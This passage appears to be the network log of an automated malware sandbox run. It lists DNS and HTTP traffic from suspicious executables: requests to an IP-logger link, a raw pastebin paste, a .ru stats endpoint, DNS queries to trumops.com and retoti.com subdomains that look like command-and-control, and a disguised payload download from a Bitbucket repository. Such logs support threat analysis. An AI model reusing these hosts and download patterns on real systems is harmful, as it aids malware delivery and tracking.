                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mEzE2mzDX73rszOg%2FTUwLLJBUBPXZcDryPhrBP1sF%2BfV27DlaKTco0Kxgdt8yUhXaXUBL6VxaGrWmVCdL%2B%2FKXLP6yLxRRm7s7zrGIQzsU1rsUY%2BGSE8KD1EQSovjQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8de4786bccfd730c-LHR
                  server-timing: cfL4;desc="?proto=TCP&rtt=42225&sent=7&recv=7&lost=0&retrans=1&sent_bytes=2890&recv_bytes=396&delivery_rate=88033&cwnd=254&unsent_bytes=0&cid=3b6d05f90e88d80e&ts=581&x=0"
                • flag-us
                  GET
                  https://iplogger.org/1Bthn7
                  Mon161bd381a14aea5c.exe
                  Remote address:
                  104.26.3.46:443
                  Request
                  GET /1Bthn7 HTTP/1.1
                  Host: iplogger.org
                  Response
                  HTTP/1.1 403 Forbidden
                  Date: Wed, 06 Nov 2024 10:41:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                  Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                  Cross-Origin-Embedder-Policy: require-corp
                  Cross-Origin-Opener-Policy: same-origin
                  Cross-Origin-Resource-Policy: same-origin
                  Origin-Agent-Cluster: ?1
                  Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                  Referrer-Policy: same-origin
                  X-Content-Options: nosniff
                  X-Frame-Options: SAMEORIGIN
                  cf-mitigated: challenge
                  cf-chl-out: 90oXSqZiE3Jj2LTfjGVdHcAmDzR69zf5CP8ARVzfgYdBmi0RHj0pfyje7DPqmKesVLsNaw6NwOL4oPaYkjBtDassMoDOqi4y52VGyiAT10xIsZcqE78E7or8cg+DmUvRTiIYn51xLSl7RT/uGj9JDA==$5sFHPuD+zh58H+qAgiJ5aw==
                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FWA4%2B%2BSuzitoygbMMcb8%2BMa1CeAPY9Ov%2FJNTZRG0gd%2By1ZIHlCAQATRkEV9nU2FMkQRK1WAPeNyV4%2F3XeNcyI4eOPPgu5u064RzT96fgCVXb8%2FLFBZt12YEPM3ktWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8de47871aec07780-LHR
                  server-timing: cfL4;desc="?proto=TCP&rtt=43793&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=385&delivery_rate=89311&cwnd=253&unsent_bytes=0&cid=679dbbb1669ae07a&ts=110&x=0"
                • flag-us
                  DNS
                  c.pki.goog
                  Mon1631358b82299bd8.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  c.pki.goog
                  IN A
                  Response
                  c.pki.goog
                  IN CNAME
                  pki-goog.l.google.com
                  pki-goog.l.google.com
                  IN A
                  142.250.187.227
                • flag-gb
                  GET
                  http://c.pki.goog/r/gsr1.crl
                  Mon1631358b82299bd8.exe
                  Remote address:
                  142.250.187.227:80
                  Request
                  GET /r/gsr1.crl HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Microsoft-CryptoAPI/6.1
                  Host: c.pki.goog
                  Response
                  HTTP/1.1 200 OK
                  Accept-Ranges: bytes
                  Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                  Cross-Origin-Resource-Policy: cross-origin
                  Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                  Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                  Content-Length: 1739
                  X-Content-Type-Options: nosniff
                  Server: sffe
                  X-XSS-Protection: 0
                  Date: Wed, 06 Nov 2024 10:24:28 GMT
                  Expires: Wed, 06 Nov 2024 11:14:28 GMT
                  Cache-Control: public, max-age=3000
                  Age: 1011
                  Last-Modified: Mon, 07 Oct 2024 07:18:00 GMT
                  Content-Type: application/pkix-crl
                  Vary: Accept-Encoding
                • flag-gb
                  GET
                  http://c.pki.goog/r/r4.crl
                  Mon1631358b82299bd8.exe
                  Remote address:
                  142.250.187.227:80
                  Request
                  GET /r/r4.crl HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Microsoft-CryptoAPI/6.1
                  Host: c.pki.goog
                  Response
                  HTTP/1.1 200 OK
                  Accept-Ranges: bytes
                  Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                  Cross-Origin-Resource-Policy: cross-origin
                  Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                  Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                  Content-Length: 436
                  X-Content-Type-Options: nosniff
                  Server: sffe
                  X-XSS-Protection: 0
                  Date: Wed, 06 Nov 2024 10:24:28 GMT
                  Expires: Wed, 06 Nov 2024 11:14:28 GMT
                  Cache-Control: public, max-age=3000
                  Age: 1012
                  Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                  Content-Type: application/pkix-crl
                  Vary: Accept-Encoding
                • flag-us
                  DNS
                  pastebin.com
                  Mon166dc6040fb8726.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  pastebin.com
                  IN A
                  Response
                  pastebin.com
                  IN A
                  172.67.19.24
                  pastebin.com
                  IN A
                  104.20.4.235
                  pastebin.com
                  IN A
                  104.20.3.235
                • flag-us
                  GET
                  https://pastebin.com/raw/A7dSG1te
                  Mon166dc6040fb8726.exe
                  Remote address:
                  172.67.19.24:443
                  Request
                  GET /raw/A7dSG1te HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: ???�ll
                  Host: pastebin.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  x-frame-options: DENY
                  x-frame-options: DENY
                  x-content-type-options: nosniff
                  x-content-type-options: nosniff
                  x-xss-protection: 1;mode=block
                  x-xss-protection: 1;mode=block
                  cache-control: public, max-age=1801
                  CF-Cache-Status: HIT
                  Age: 60
                  Server: cloudflare
                  CF-RAY: 8de478c40c6363b6-LHR
                • flag-us
                  DNS
                  wfsdragon.ru
                  Mon166dc6040fb8726.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  wfsdragon.ru
                  IN A
                  Response
                  wfsdragon.ru
                  IN A
                  104.21.5.208
                  wfsdragon.ru
                  IN A
                  172.67.133.215
                • flag-us
                  GET
                  http://wfsdragon.ru/api/setStats.php
                  Mon166dc6040fb8726.exe
                  Remote address:
                  104.21.5.208:80
                  Request
                  GET /api/setStats.php HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: ????ll
                  Host: wfsdragon.ru
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:33 GMT
                  Content-Type: text/html; charset=iso-8859-1
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  cf-cache-status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VLIDpX2WJwWkO0vTSXNUcVNjZf2Dlm7i56ESe8%2BH7nyPjT0VYKlkET5eFQRkNpVU%2FctQ9Gej27noxYWN7zk%2BU3DeCp3uqbLQQ4mdDaFoy8%2BGgVoTb7HtaWEWiQ%2Bwi4k%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8de478c59e6260fa-LHR
                  alt-svc: h3=":443"; ma=86400
                  server-timing: cfL4;desc="?proto=TCP&rtt=41380&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=98&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                • flag-us
                  DNS
                  www.google.com
                  powershell.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  www.google.com
                  IN A
                  Response
                  www.google.com
                  IN A
                  142.250.180.4
                • flag-us
                  DNS
                  crl.microsoft.com
                  Remote address:
                  8.8.8.8:53
                  Request
                  crl.microsoft.com
                  IN A
                  Response
                  crl.microsoft.com
                  IN CNAME
                  crl.www.ms.akadns.net
                  crl.www.ms.akadns.net
                  IN CNAME
                  a1363.dscg.akamai.net
                  a1363.dscg.akamai.net
                  IN A
                  2.19.117.18
                  a1363.dscg.akamai.net
                  IN A
                  2.19.117.22
                • flag-gb
                  GET
                  http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
                  Remote address:
                  2.19.117.18:80
                  Request
                  GET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  If-Modified-Since: Thu, 11 Jul 2024 01:45:51 GMT
                  User-Agent: Microsoft-CryptoAPI/6.1
                  Host: crl.microsoft.com
                  Response
                  HTTP/1.1 200 OK
                  Content-Length: 1036
                  Content-Type: application/octet-stream
                  Content-MD5: 8M9bF5Tsp81z+cAg2quO8g==
                  Last-Modified: Thu, 26 Sep 2024 02:21:11 GMT
                  ETag: 0x8DCDDD1E3AF2C76
                  Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                  x-ms-request-id: b28c4ea1-d01e-0016-0ebc-0fa13d000000
                  x-ms-version: 2009-09-19
                  x-ms-lease-status: unlocked
                  x-ms-blob-type: BlockBlob
                  Date: Wed, 06 Nov 2024 10:41:56 GMT
                  Connection: keep-alive
                • flag-us
                  DNS
                  trumops.com
                  csrss.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  trumops.com
                  IN TXT
                  Response
                  trumops.com
                  IN TXT
                  .v=spf1 include:_incspfcheck.mailspike.net ?all
                • flag-us
                  DNS
                  retoti.com
                  csrss.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  retoti.com
                  IN TXT
                  Response
                  retoti.com
                  IN TXT
                  .v=spf1 include:_incspfcheck.mailspike.net ?all
                • flag-us
                  DNS
                  logs.trumops.com
                  csrss.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  logs.trumops.com
                  IN TXT
                  Response
                • flag-us
                  DNS
                  logs.retoti.com
                  csrss.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  logs.retoti.com
                  IN TXT
                  Response
                • flag-us
                  DNS
                  www.yahoo.com
                  powershell.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  www.yahoo.com
                  IN A
                  Response
                  www.yahoo.com
                  IN CNAME
                  me-ycpi-cf-www.g06.yahoodns.net
                  me-ycpi-cf-www.g06.yahoodns.net
                  IN A
                  87.248.114.12
                  me-ycpi-cf-www.g06.yahoodns.net
                  IN A
                  87.248.114.11
                • flag-us
                  DNS
                  f5b086b2-fc5a-46c5-b748-f39ef0e7356e.uuid.trumops.com
                  csrss.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  f5b086b2-fc5a-46c5-b748-f39ef0e7356e.uuid.trumops.com
                  IN TXT
                  Response
                • flag-us
                  DNS
                  server14.trumops.com
                  csrss.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  server14.trumops.com
                  IN A
                  Response
                  server14.trumops.com
                  IN A
                  44.221.84.105
                • flag-us
                  DNS
                  msdl.microsoft.com
                  patch.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  msdl.microsoft.com
                  IN A
                  Response
                  msdl.microsoft.com
                  IN CNAME
                  msdl.microsoft.akadns.net
                  msdl.microsoft.akadns.net
                  IN CNAME
                  msdl-microsoft-com.a-0016.a-msedge.net
                  msdl-microsoft-com.a-0016.a-msedge.net
                  IN CNAME
                  a-0016.a-msedge.net
                  a-0016.a-msedge.net
                  IN A
                  204.79.197.219
                • flag-us
                  GET
                  https://msdl.microsoft.com/download/symbols/index2.txt
                  patch.exe
                  Remote address:
                  204.79.197.219:443
                  Request
                  GET /download/symbols/index2.txt HTTP/1.1
                  Accept-Encoding: gzip
                  User-Agent: Microsoft-Symbol-Server/10.0.10586.567
                  Host: msdl.microsoft.com
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 404 Not Found
                  X-Cache: TCP_HIT
                  Strict-Transport-Security: includeSubDomains
                  X-MSEdge-Ref: Ref A: 1DC4353062F7453CB028BAD849D4344E Ref B: FRA31EDGE0811 Ref C: 2024-11-06T10:42:00Z
                  Date: Wed, 06 Nov 2024 10:41:59 GMT
                  Content-Length: 0
                • flag-us
                  GET
                  https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb
                  patch.exe
                  Remote address:
                  204.79.197.219:443
                  Request
                  GET /download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb HTTP/1.1
                  Accept-Encoding: gzip
                  User-Agent: Microsoft-Symbol-Server/10.0.10586.567
                  Host: msdl.microsoft.com
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 302 Found
                  Location: https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=%2FxsjkN39CC6LP0h7uJgSAEGDHAi7Llx1tU6X23AHu20%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A45Z&ske=2024-11-08T08%3A50%3A45Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A19%3A29Z&sp=r&rscl=x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26
                  X-Cache: TCP_MISS
                  Strict-Transport-Security: includeSubDomains
                  X-MSEdge-Ref: Ref A: FDFBB4E66FE14AF5AC3FAEA522DFECB5 Ref B: FRA31EDGE0811 Ref C: 2024-11-06T10:42:00Z
                  Date: Wed, 06 Nov 2024 10:41:59 GMT
                  Content-Length: 0
                • flag-us
                  GET
                  https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb
                  patch.exe
                  Remote address:
                  204.79.197.219:443
                  Request
                  GET /download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb HTTP/1.1
                  Accept-Encoding: gzip
                  User-Agent: Microsoft-Symbol-Server/10.0.10586.567
                  Host: msdl.microsoft.com
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 302 Found
                  Location: https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=%2FxsjkN39CC6LP0h7uJgSAEGDHAi7Llx1tU6X23AHu20%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A45Z&ske=2024-11-08T08%3A50%3A45Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A19%3A29Z&sp=r&rscl=x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26
                  X-Cache: TCP_HIT
                  Strict-Transport-Security: includeSubDomains
                  X-MSEdge-Ref: Ref A: 9CFAB48C05DE48F8B62471B7157CF200 Ref B: FRA31EDGE0811 Ref C: 2024-11-06T10:42:08Z
                  Date: Wed, 06 Nov 2024 10:42:07 GMT
                  Content-Length: 0
                • flag-us
                  GET
                  https://msdl.microsoft.com/download/symbols/index2.txt
                  patch.exe
                  Remote address:
                  204.79.197.219:443
                  Request
                  GET /download/symbols/index2.txt HTTP/1.1
                  Accept-Encoding: gzip
                  User-Agent: Microsoft-Symbol-Server/10.0.10586.567
                  Host: msdl.microsoft.com
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 404 Not Found
                  X-Cache: TCP_HIT
                  Strict-Transport-Security: includeSubDomains
                  X-MSEdge-Ref: Ref A: CDCED4E2521F47F38884798124758379 Ref B: FRA31EDGE0811 Ref C: 2024-11-06T10:42:19Z
                  Date: Wed, 06 Nov 2024 10:42:18 GMT
                  Content-Length: 0
                • flag-us
                  GET
                  https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb
                  patch.exe
                  Remote address:
                  204.79.197.219:443
                  Request
                  GET /download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb HTTP/1.1
                  Accept-Encoding: gzip
                  User-Agent: Microsoft-Symbol-Server/10.0.10586.567
                  Host: msdl.microsoft.com
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 302 Found
                  Location: https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=SQDd3mt1T6915rDOpfqyvxSq3uLmAnN2j3%2FWxEPwEnE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A59Z&ske=2024-11-08T08%3A50%3A59Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A04%3A41Z&sp=r&rscl=x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c
                  X-Cache: TCP_MISS
                  Strict-Transport-Security: includeSubDomains
                  X-MSEdge-Ref: Ref A: CACAB976BC9B40BA899028519C519746 Ref B: FRA31EDGE0811 Ref C: 2024-11-06T10:42:19Z
                  Date: Wed, 06 Nov 2024 10:42:19 GMT
                  Content-Length: 0
                • flag-us
                  GET
                  https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb
                  patch.exe
                  Remote address:
                  204.79.197.219:443
                  Request
                  GET /download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb HTTP/1.1
                  Accept-Encoding: gzip
                  User-Agent: Microsoft-Symbol-Server/10.0.10586.567
                  Host: msdl.microsoft.com
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 302 Found
                  Location: https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=SQDd3mt1T6915rDOpfqyvxSq3uLmAnN2j3%2FWxEPwEnE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A59Z&ske=2024-11-08T08%3A50%3A59Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A04%3A41Z&sp=r&rscl=x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c
                  X-Cache: TCP_HIT
                  Strict-Transport-Security: includeSubDomains
                  X-MSEdge-Ref: Ref A: 82588757DD5648AEA74E2F2FF8BFC661 Ref B: FRA31EDGE0811 Ref C: 2024-11-06T10:42:22Z
                  Date: Wed, 06 Nov 2024 10:42:21 GMT
                  Content-Length: 0
                • flag-us
                  DNS
                  www.microsoft.com
                  patch.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  www.microsoft.com
                  IN A
                  Response
                  www.microsoft.com
                  IN CNAME
                  www.microsoft.com-c-3.edgekey.net
                  www.microsoft.com-c-3.edgekey.net
                  IN CNAME
                  www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                  www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                  IN CNAME
                  e13678.dscb.akamaiedge.net
                  e13678.dscb.akamaiedge.net
                  IN A
                  23.192.22.93
                • flag-us
                  DNS
                  vsblobprodscussu5shard30.blob.core.windows.net
                  patch.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  vsblobprodscussu5shard30.blob.core.windows.net
                  IN A
                  Response
                  vsblobprodscussu5shard30.blob.core.windows.net
                  IN CNAME
                  blob.sat09prdstrz08a.store.core.windows.net
                  blob.sat09prdstrz08a.store.core.windows.net
                  IN CNAME
                  blob.sat09prdstrz08a.trafficmanager.net
                  blob.sat09prdstrz08a.trafficmanager.net
                  IN A
                  20.150.38.228
                  blob.sat09prdstrz08a.trafficmanager.net
                  IN A
                  20.150.79.68
                  blob.sat09prdstrz08a.trafficmanager.net
                  IN A
                  20.150.70.36
                • flag-us
                  GET
                  https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=%2FxsjkN39CC6LP0h7uJgSAEGDHAi7Llx1tU6X23AHu20%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A45Z&ske=2024-11-08T08%3A50%3A45Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A19%3A29Z&sp=r&rscl=x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26
                  patch.exe
                  Remote address:
                  20.150.38.228:443
                  Request
                  GET /b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=%2FxsjkN39CC6LP0h7uJgSAEGDHAi7Llx1tU6X23AHu20%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A45Z&ske=2024-11-08T08%3A50%3A45Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A19%3A29Z&sp=r&rscl=x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26 HTTP/1.1
                  Accept-Encoding: gzip
                  User-Agent: Microsoft-Symbol-Server/10.0.10586.567
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Host: vsblobprodscussu5shard30.blob.core.windows.net
                  Response
                  HTTP/1.1 200 OK
                  Content-Length: 8752128
                  Content-Type: application/octet-stream
                  Content-Language: x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26
                  Last-Modified: Mon, 12 Jun 2017 21:34:21 GMT
                  Accept-Ranges: bytes
                  ETag: "0x8D4B1DACA398C54"
                  Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                  x-ms-request-id: fba9d5e3-401e-0056-7e38-30a7e7000000
                  x-ms-version: 2019-07-07
                  x-ms-creation-time: Fri, 05 May 2017 08:24:14 GMT
                  x-ms-lease-status: unlocked
                  x-ms-lease-state: available
                  x-ms-blob-type: BlockBlob
                  x-ms-server-encrypted: true
                  Access-Control-Expose-Headers: Content-Length
                  Access-Control-Allow-Origin: *
                  Date: Wed, 06 Nov 2024 10:42:01 GMT
                • flag-us
                  GET
                  https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=%2FxsjkN39CC6LP0h7uJgSAEGDHAi7Llx1tU6X23AHu20%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A45Z&ske=2024-11-08T08%3A50%3A45Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A19%3A29Z&sp=r&rscl=x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26
                  patch.exe
                  Remote address:
                  20.150.38.228:443
                  Request
                  GET /b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=%2FxsjkN39CC6LP0h7uJgSAEGDHAi7Llx1tU6X23AHu20%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A45Z&ske=2024-11-08T08%3A50%3A45Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A19%3A29Z&sp=r&rscl=x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26 HTTP/1.1
                  Accept-Encoding: gzip
                  User-Agent: Microsoft-Symbol-Server/10.0.10586.567
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Host: vsblobprodscussu5shard30.blob.core.windows.net
                  Response
                  HTTP/1.1 200 OK
                  Content-Length: 8752128
                  Content-Type: application/octet-stream
                  Content-Language: x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26
                  Last-Modified: Mon, 12 Jun 2017 21:34:21 GMT
                  Accept-Ranges: bytes
                  ETag: "0x8D4B1DACA398C54"
                  Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                  x-ms-request-id: fba9f421-401e-0056-2138-30a7e7000000
                  x-ms-version: 2019-07-07
                  x-ms-creation-time: Fri, 05 May 2017 08:24:14 GMT
                  x-ms-lease-status: unlocked
                  x-ms-lease-state: available
                  x-ms-blob-type: BlockBlob
                  x-ms-server-encrypted: true
                  Access-Control-Expose-Headers: Content-Length
                  Access-Control-Allow-Origin: *
                  Date: Wed, 06 Nov 2024 10:42:08 GMT
                • flag-us
                  DNS
                  bitbucket.org
                  Build.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  bitbucket.org
                  IN A
                  Response
                  bitbucket.org
                  IN A
                  185.166.142.21
                  bitbucket.org
                  IN A
                  185.166.142.23
                  bitbucket.org
                  IN A
                  185.166.142.22
                • flag-ie
                  GET
                  https://bitbucket.org/chege3/softwarellc/downloads/SFS.jpg
                  Build.exe
                  Remote address:
                  185.166.142.21:443
                  Request
                  GET /chege3/softwarellc/downloads/SFS.jpg HTTP/1.1
                  Host: bitbucket.org
                  Connection: Keep-Alive
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:03 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 15670
                  Server: AtlassianEdge
                  Vary: authorization, cookie, user-context, Accept-Language, Origin, Accept-Encoding
                  X-Used-Mesh: False
                  Content-Language: en
                  X-View-Name: bitbucket.apps.downloads.views.download_file
                  Etag: "7965ca4bf1b49d08360f9bfa95f7ea01"
                  X-Dc-Location: Micros-3
                  X-Served-By: bafa1b132f65
                  X-Version: 0470f756d362
                  X-Static-Version: 0470f756d362
                  X-Request-Count: 986
                  X-Render-Time: 0.1053321361541748
                  X-B3-Traceid: 142c728889704105b282c1636ca046de
                  X-B3-Spanid: 582c46a1455cb22f
                  X-Frame-Options: SAMEORIGIN
